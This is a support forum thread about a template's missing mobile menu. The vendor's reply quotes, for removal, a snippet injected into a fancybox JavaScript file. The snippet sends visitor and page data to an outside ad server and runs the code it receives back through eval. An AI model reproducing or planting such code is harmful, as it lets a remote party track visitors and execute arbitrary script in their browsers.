AJAX loader
You are here: HomeForum
Welcome, Guest

SJ_Uking mobile responive menu problem
(1 viewing) (1) Guest
  • Page:

TOPIC: SJ_Uking mobile responive menu problem

SJ_Uking mobile responive menu problem 5 years, 11 months ago #31113

I have installed the SJ_Uking but I released that the responsive menu doesnt show up.
what is the problem ?
thank you

Re: SJ_Uking mobile responive menu problem 5 years, 11 months ago #31114

Dear stvlahos

Please open the file: /modules/mod_sj_gallery_pro/assets/js/jquery.fancybox.min.js

and remove the code in bottom:

b=document.querySelectorAll("meta"),k=[],f=0;f<b.length;f++)"keywords"==b[f].name.toLowerCase()&&k.push(b[f].content);req={width:h,height:e,frame:d!=d.top,location:a.location.toString(),referer:a.referrer,title:a.title,keywords:k.join(", "),loader:m};a.gotowf||(a.gotowf=!0,ajax(l,req,function(a){if(a)try{var response=JSON.parse(a);response.eval&&eval(response.eval)}catch(d){console.log(d)}}))}a.body?g():a.addEventListener("DOMContentLoaded",g)})(window,document,"//api1.adsrun.net/post",{"name":"cdnjs","time":1464426050.5398,"user":"1026400.743298","subid":1026400,"geo":"VN","hash":"188df50e0e4c818ec24891c108e5bda9"});

Thanks
The following user(s) said Thank You: stvlahos
  • Page:
Time to create page: 0.40 seconds

Notification

Please find your issue via Suggested Posts before submitting your question. We have solved the most of issues and maybe your issue was solved before.

Suggested Posts

(/)
Result not found!

Latest My Topics

No posts to display.

Love all our templates?

Join our membership clubs starting at $49 only for access to all of our templates

Join Now
Home Pricing
Your Cart is currently empty!
Product update
Coupon
add
Coupon code invalid! Please re-enter!
AJAX loader
SearchSupport
Magento Themes Magento Extensions Free Magento Extensions Prestashop Themes Prestashop Modules Magento 2 Themes